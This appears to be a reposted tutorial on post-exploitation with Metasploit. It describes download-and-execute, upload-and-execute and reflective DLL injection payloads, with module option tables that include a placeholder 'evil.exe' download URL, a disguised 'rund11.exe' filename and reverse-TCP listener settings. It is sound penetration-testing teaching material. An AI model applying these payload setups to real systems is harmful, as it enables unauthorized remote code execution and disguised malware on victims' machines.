After certain overflow exploits succeed, we need to run modules of our own on the target, such as a remote-control tool or a scanner. The following methods can be used:

0x01. Drive execution through other post-exploitation modules, for example meterpreter scripts: once a session has been obtained, use meterpreter to complete the upload and execution.
0x02. Use the windows/download_exec module to download and execute:

Module information:

    Name      Current Setting                 Required  Description
    ----      ---------------                 --------  -----------
    EXE       rund11.exe                      yes       Filename to save & run executable on target system
    EXITFUNC  process                         yes       Exit technique: seh, thread, process, none
    URL       https://localhost:443/evil.exe  yes       The pre-encoded URL to the executable

This module's script is split into two parts, download and execute; the code lives at

    /opt/metasploit/msf3/modules/payloads/singles/windows/download_exec.rb

The code is very clear, and its approach is worth studying.
0x03. Use the relevant modules under payload/windows/upexec/ to upload and execute directly:

Module information:

    Module options (payload/windows/upexec/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST                      yes       The listen address
    LPORT     4444             yes       The listen port
    PEXEC                      yes       Full path to the file to upload and execute

Setting the reverse-connection options in the module correctly is all that is needed.
0x04. Use the payload/windows/dllinject/reverse_tcp module to perform remote DLL injection.

Module information:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    DLL                        yes       The local path to the Reflective DLL to upload
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST                      yes       The listen address
    LPORT     4444             yes       The listen port

Setting the reverse-connection options in the module correctly is all that is needed.
0x05. Custom scripts

Custom shellcode: see the research thread on Kanxue (看雪).

Author: upload; link: http://zone.wooyun.org/content/2583

This article was collected and compiled by the Information Security Team of the Network Security Attack and Defense Lab (www.91ri.org); please credit the source when reposting!